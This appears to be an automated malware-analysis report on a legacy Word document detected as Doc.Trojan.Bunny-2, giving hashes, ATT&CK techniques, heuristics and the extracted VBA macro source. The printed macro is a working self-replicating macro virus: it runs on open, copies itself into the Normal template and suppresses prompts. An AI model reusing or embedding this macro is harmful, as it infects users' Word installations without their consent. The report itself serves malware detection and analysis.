Office (OLE) malware analysis — malicious · 9ec9eb2b5d01f858

MALICIOUS

Office (OLE)

27.0 KB Created: 2000-03-16 08:23:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 31b148e088e7ac81a14e3cf7fd8efa3a SHA-1: a4047fb9ab6eee7eedbbc0e10ae7870b1703c980 SHA-256: 9ec9eb2b5d01f85809aa4018ce99cf0e4085e9c65616c6fa75a6e0336ac862d7

200 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen subroutine, a common technique for executing malicious code upon document opening. The script attempts to export itself as 'bunnies.cpl' to 'C:\windows\system\bunnies.cpl' and then import it into the NormalTemplate, likely to establish persistence or facilitate further execution. The ClamAV detection 'Doc.Trojan.Bunny-2' further supports the malicious nature of the file.

Heuristics 4

ClamAV: Doc.Trojan.Bunny-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Bunny-2
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1018 bytes
SHA-256: `b929a4bc3d64819a1ad511f1f49cefddf952f0102040aa6a14ae7ccc6623a891`
Detection ClamAV: Doc.Trojan.Bunny-2 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Bunnies" Public SCode As String ' W97T/Bunnies .a ' Word Trojan Bunnies by Error Sub AutoOpen() On Error Resume Next Application.EnableCancelKey = wdCancelDisabled Options.SaveNormalPrompt = False SCode = Dir("C:\windows\system\bunnies.cpl") If SCode = "bunnies.cpl" Then Call Spread Else ActiveDocument.VBProject.VBComponents("Bunnies").Export ("C:\Windows\System\Bunnies.cpl") End Sub Function Spread() On Error Resume Next Application.EnableCancelKey = wdCancelDisabled ' Begin to do what bunnies do... For X = 1 To 10000 Step 1 With NormalTemplate.VBProject.VBComponents.Import("C:\Windows\System\Bunnies.cpl") Next X NormalTemplate.Save MsgBox "Bunnies!!!!", 48 Kill "C:\Windows\System\Bunnies.cpl" End Function

Open this report in the interactive analyzer, or submit your own file for analysis.